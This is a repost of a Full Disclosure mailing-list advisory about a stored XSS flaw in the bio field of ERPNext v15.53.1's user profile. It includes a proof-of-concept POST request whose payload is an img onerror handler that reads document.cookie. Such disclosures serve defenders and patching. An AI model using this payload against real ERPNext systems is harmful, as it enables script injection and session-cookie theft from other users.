ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page
ERPNext v15.53.1 存在存储型XSS漏洞,攻击者可通过用户资料中的bio字段注入JavaScript代码,在其他用户查看个人资料时执行恶意脚本。 2025-6-3 13:3:1 Author: seclists.org(查看原文) 阅读量:12 收藏
ERPNext v15.53.1 存在存储型XSS漏洞,攻击者可通过用户资料中的bio字段注入JavaScript代码,在其他用户查看个人资料时执行恶意脚本。 2025-6-3 13:3:1 Author: seclists.org(查看原文) 阅读量:12 收藏
Full Disclosure mailing list archives
From: Ron E <ronaldjedgerson () gmail com>
Date: Fri, 30 May 2025 23:21:17 -0400
An authenticated attacker can inject JavaScript into the bio field of their
user profile. When the profile is viewed by another user, the injected
script executes.
*Proof of Concept:*
POST
/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info
HTTP/2
Host: --host--
profile_info={"bio":"\"><img src=x onerror=alert(document.cookie)>"}
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page Ron E (Jun 03)
文章来源: https://seclists.org/fulldisclosure/2025/Jun/11
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh